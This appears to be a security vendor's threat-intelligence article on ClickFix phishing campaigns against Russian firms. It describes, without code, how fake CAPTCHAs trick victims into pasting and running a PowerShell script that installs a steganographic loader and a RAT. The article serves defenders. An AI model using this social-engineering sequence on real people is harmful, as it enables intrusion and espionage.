Fake CAPTCHAs used in new attacks on Russian companies

Close to 30 Russian companies were attacked in May and early June. The attacks utilized the ClickFix technique which tricked users into running malicious scripts. Previously, such attacks had only been recorded outside Russia

June 26, 2025

In May 2025, BI.ZONE Threat Intelligence detected at least two campaigns employing the ClickFix technique against Russian organizations. Under the guise of law enforcement agencies, the threat actors would send a PDF document to their victims.

The text inside was blurred making it impossible to read. To access the file, a victim was asked to confirm they were human. In reality, clicking the button redirected them to the attackers’ website, which again displayed a window with a fake CAPTCHA. By clicking “I’m not a robot,” the victim unknowingly copied a PowerShell script to the clipboard.

The victim was then asked to execute a series of commands on their device, purportedly to confirm access permissions to the document so it would open correctly. Instead, these commands ran a malicious code copied by clicking the CAPTCHA. Specifically, Win + R opened the Run terminal, Ctrl + V pasted the script from the clipboard into the Run window, and pressing Enter launched it.

The ClickFix technique is named so because the attackers ask a victim to perform a series of simple actions to fix a technical issue. Essentially, the victim is tricked into executing a malicious command.

Adversaries have employed ClickFix since spring 2024, but this is the first recorded use against companies in Russia and other CIS countries. Criminals continue to experiment with social engineering techniques, using new scripts that are still unfamiliar to users and, thus, are harder to recognize.

Oleg Skulkin

Head of BI.ZONE Threat Intelligence

The script initiated by a victim downloaded a PNG image from the C2 server and extracted from it a malware called Octowave Loader.

Octowave Loader incorporated several components, including some malicious files hidden among a heap of legitimate ones. One of them concealed an embedded executable code that subsequently ran on a victim’s device another malware, a remote access trojan (RAT), not classified or described by any researcher previously. It was most likely developed by the adversaries themselves.

The detected RAT first exfiltrated basic information about a compromised system (username, permissions, OS version, etc.) to allow the criminals execute commands and launch processes on a victim’s device. Such a long chain of steganography attack aims to bypass cybersecurity defenses and increase the chances of compromise.

The adversaries used political content memes as a PNG file which carried the malicious code. However, a victim could not see the image because the file was downloaded discreetly and would not open for viewing.

The use of own RATs likely indicates that the goal of the adversaries was espionage. Furthermore, the phishing emails were disguised as messages from law enforcement agencies, a signature most characteristic of espionage clusters.

In both campaigns, the attacks started with phishing emails. You can leverage dedicated services such as BI.ZONE Mail Security to filter out unwanted messages and protect your email communications, while endpoint detection and response solutions, such as BI.ZONE EDR, can help you track suspicious activity, including PowerShell executions. These measures allow you to mitigate risks through early threat detection, automatic and manual response.

Threat actors are constantly innovating their approaches and their arsenal to carry out attacks. Data from portals like BI.ZONE Threat Intelligence can help you keep track of attacks and build an effective cybersecurity strategy. This information ensures the precision of your security solutions, which in turn accelerates incident response and protects your company from the most critical threats.